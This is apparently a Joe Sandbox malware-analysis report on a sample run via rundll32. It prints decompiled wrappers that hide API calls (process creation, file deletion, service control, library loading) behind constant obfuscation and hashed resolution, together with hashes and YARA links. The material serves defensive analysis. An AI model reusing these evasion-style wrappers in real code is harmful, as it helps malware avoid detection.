Associated: 0000000A.00000002.2092976084.0000000000250000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2093011511.000000000026C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_250000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 25c7f53960982c4511406ae7b859bcf28ff628bb3fc7f76f008355ad4f77eeea
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: 54F037B081120CFFDB04EFA4D98689EBFBAEB40300F208199E804AB250D3715B54AB54

Uniqueness

Uniqueness Score: -1.00%

Function 0026976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0026976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0025602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002607A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00269772
0x00269773
0x00269778
0x0026977a
0x0026977b
0x0026977e
0x0026977f
0x00269782
0x00269785
0x00269788
0x00269789
0x0026978c
0x0026978f
0x00269790
0x00269791
0x00269794
0x00269797
0x0026979a
0x0026979d
0x002697a0
0x002697a3
0x002697a6
0x002697a7
0x002697a8
0x002697ad
0x002697b7
0x002697c3
0x002697ca
0x002697d1
0x002697d8
0x002697df
0x002697e3
0x002697fc
0x00269816
0x0026981d

APIs

CreateProcessW.KERNEL32(0025591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0025591A), ref: 00269816

Memory Dump Source

Source File: 0000000A.00000002.2092986854.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true

Associated: 0000000A.00000002.2092976084.0000000000250000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2093011511.000000000026C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_250000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 6edb69648b3f94e7e03f1beca71628678257b7b9f364a73f49670ed32773ee0c
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 8D11B372911148BBDF1A9F96DC0ACDF7F7AEF89750F104148FA1556120D2728A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0025B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0025B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0025602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002607A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x0025b569
0x0025b56a
0x0025b56d
0x0025b572
0x0025b574
0x0025b577
0x0025b57a
0x0025b57d
0x0025b580
0x0025b583
0x0025b586
0x0025b587
0x0025b58a
0x0025b58d
0x0025b590
0x0025b593
0x0025b594
0x0025b595
0x0025b59a
0x0025b5a4
0x0025b5b8
0x0025b5c0
0x0025b5c4
0x0025b5cb
0x0025b5d2
0x0025b5d9
0x0025b5e6
0x0025b5fd
0x0025b604

APIs

CreateFileW.KERNELBASE(00260668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00260668,?,?,?,?), ref: 0025B5FD

Memory Dump Source

Source File: 0000000A.00000002.2092986854.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true

Associated: 0000000A.00000002.2092976084.0000000000250000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2093011511.000000000026C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_250000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: d3f7f741c048d2d48f6a860bb896841affe694d53228fd13fcd338edbbf0ba2c
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 6911B272801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862160D3729A60EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0026981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0026981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0025602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002607A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00269821
0x00269822
0x00269825
0x00269828
0x0026982a
0x0026982c
0x0026982f
0x00269832
0x00269835
0x00269836
0x00269837
0x0026983c
0x00269855
0x00269858
0x0026985f
0x00269866
0x0026986d
0x00269874
0x0026987b
0x0026988e
0x0026989b
0x002698a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002587F2,0000CAAE,0000510C,AD82F196), ref: 0026989B

Memory Dump Source

Source File: 0000000A.00000002.2092986854.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true

Associated: 0000000A.00000002.2092976084.0000000000250000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2093011511.000000000026C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_250000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 1cc55234befb484f790854e356106a939cd27aa4cb83e754257353b9b2be817a
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: A5019A72801208FBDB04EFD5DC46CDFBF79EF85310F108188F908A6220E6729B619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00267BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00267BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0025602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002607A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00267bf7
0x00267bf8
0x00267bfa
0x00267bfd
0x00267bff
0x00267c02
0x00267c06
0x00267c07
0x00267c0f
0x00267c1d
0x00267c25
0x00267c2d
0x00267c31
0x00267c38
0x00267c3f
0x00267c46
0x00267c4a
0x00267c5e
0x00267c67
0x00267c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00267C67

Memory Dump Source

Source File: 0000000A.00000002.2092986854.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true

Associated: 0000000A.00000002.2092976084.0000000000250000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2093011511.000000000026C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_250000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 798c8b6fb1566ed6b37e1f062d61cd82022f54404098e72b2d6c61ce261cee56
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: D3014FB190120CFFEB09DF94C84A8DEBBB5EF44314F108198F40567240E6B15F609B91

Uniqueness

Uniqueness Score: -1.00%

Function 0025F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0025F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0025602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002607A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x0025f662
0x0025f663
0x0025f665
0x0025f668
0x0025f66a
0x0025f66d
0x0025f670
0x0025f673
0x0025f677
0x0025f678
0x0025f67d
0x0025f687
0x0025f693
0x0025f69a
0x0025f6a1
0x0025f6a5
0x0025f6a9
0x0025f6b0
0x0025f6c9
0x0025f6d8
0x0025f6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0025F6D8

Memory Dump Source

Source File: 0000000A.00000002.2092986854.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true

Associated: 0000000A.00000002.2092976084.0000000000250000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2093011511.000000000026C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_250000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 59fc6015fb4b90e20d2feef3227640ce251512d2d5e18bf623402f88a6f0aace
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: 4D01E5B6901208BBEF05AF94DC4A8DF7F75EB05324F148188F90462250D6B25E61EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0025B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0025B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0025602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002607A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0025b6f3
0x0025b6f8
0x0025b702
0x0025b70b
0x0025b712
0x0025b719
0x0025b720
0x0025b727
0x0025b72e
0x0025b747
0x0025b759
0x0025b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0025B759

Memory Dump Source

Source File: 0000000A.00000002.2092986854.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true

Associated: 0000000A.00000002.2092976084.0000000000250000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2093011511.000000000026C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_250000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 460edcf3472d15c42e110d486e6de1c221151cd228eaa9cab750971bf5c0b1cf
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: B5018BB294030CFBEF45DF90DD06E9E7BB5EF18704F108188FA09261A0D3B25E20AB61

Uniqueness

Uniqueness Score: -1.00%

Function 0026AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0026AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0025602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002607A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0026aa3f
0x0026aa40
0x0026aa41
0x0026aa44
0x0026aa47
0x0026aa4b
0x0026aa4c
0x0026aa51
0x0026aa5b
0x0026aa64
0x0026aa68
0x0026aa6f
0x0026aa76
0x0026aa8d
0x0026aa90
0x0026aa9d
0x0026aaa8
0x0026aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0026AAA8

Memory Dump Source

Source File: 0000000A.00000002.2092986854.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true

Associated: 0000000A.00000002.2092976084.0000000000250000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2093011511.000000000026C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_250000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: 626853f40b83577a8709cb0c6364f774f1d7abf900c33c90cba9e43961ac41ed
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 90F069B191020CFFDF08EF94DD4A89EBFB4EB40304F108088F805A7250D3B29B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 00255FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00255FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0025602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002607A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x00255fb5
0x00255fb6
0x00255fb7
0x00255fbb
0x00255fbc
0x00255fc1
0x00255fcb
0x00255fd7
0x00255fde
0x00255fe5
0x00255ffc
0x00255fff
0x00256006
0x0025600d
0x0025601a
0x00256025
0x0025602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 00256025

Memory Dump Source

Source File: 0000000A.00000002.2092986854.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true

Associated: 0000000A.00000002.2092976084.0000000000250000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2093011511.000000000026C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_250000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 318acac94787bcf4cdffac460b5c7f0bd8662ffd341962fab0f8f4256a71e840
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: DCF04FB0C11208FFDB08DFA0E94689EBFB8EB40300F208198E809A7260E7729F559F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2884 Parent PID: 2880 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	16.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	994
Total number of Limit Nodes:	13

Executed Functions

Function 002C2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E002C2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E002C602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002D07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x002c295f
0x002c2964
0x002c2967
0x002c296a
0x002c296d
0x002c296e
0x002c296f
0x002c2977
0x002c2985
0x002c298a
0x002c2992
0x002c299a
0x002c29a2
0x002c29a9
0x002c29b0
0x002c29b7
0x002c29bb
0x002c29cf
0x002c29dc
0x002c29e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002C29DC

Strings

<^, xrefs: 002C2977

Memory Dump Source

Source File: 0000000B.00000002.2095271889.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true

Associated: 0000000B.00000002.2095266203.00000000002C0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2095288827.00000000002DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c0000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 298c9948ab27f537ea18a68636fbefa599cdee7894828efcba0b3336b1731e20
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: 52016D72A00108BFEB14DF95DC4A9DFBFB6EF44310F108089F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 002CC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E002CC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E002C602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002D07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x002cc6e1
0x002cc6e6
0x002cc6f0
0x002cc6fc
0x002cc703
0x002cc706
0x002cc70d
0x002cc711
0x002cc715
0x002cc71c
0x002cc723
0x002cc72a
0x002cc731
0x002cc738
0x002cc751
0x002cc762
0x002cc768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 002CC762

Strings

/O, xrefs: 002CC6E6

Memory Dump Source

Source File: 0000000B.00000002.2095271889.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true

Associated: 0000000B.00000002.2095266203.00000000002C0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2095288827.00000000002DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c0000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: eba804cfb1708133eecf51fc6e686f85a13ab16d12e92fbcbd7321041c4e9a05
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: BE1133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90966220D3B14B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 002C1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E002C1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E002C602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002D07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x002c1006
0x002c1009
0x002c100c
0x002c1011
0x002c1016
0x002c101d
0x002c1026
0x002c102d
0x002c1034
0x002c103b
0x002c1047
0x002c104f
0x002c1057
0x002c105e
0x002c1065
0x002c106c
0x002c1073
0x002c1077
0x002c108b
0x002c1096
0x002c109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 002C1096

Strings

[, xrefs: 002C103B

Memory Dump Source

Source File: 0000000B.00000002.2095271889.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true

Associated: 0000000B.00000002.2095266203.00000000002C0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2095288827.00000000002DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c0000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: 3d178c4779fafcc36863b262186f2e2f7717b1cd17556721c955f9b58a73b1a8
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: E7015BB6D01309BBEF04DF94C94AADEBBB1AB54318F108188E41466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 002C4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E002C4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002D07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x002c485e
0x002c487a
0x002c487d
0x002c4884
0x002c488b
0x002c4892
0x002c489d
0x002c48a0
0x002c48ad
0x002c48b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 002C48B7

Strings

[, xrefs: 002C488B

Memory Dump Source

Source File: 0000000B.00000002.2095271889.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true

Associated: 0000000B.00000002.2095266203.00000000002C0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2095288827.00000000002DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c0000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: 7cc51aa423d44c523c078bcf2de7b93abc3f32d93dc7789c59202c98a93c806a
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
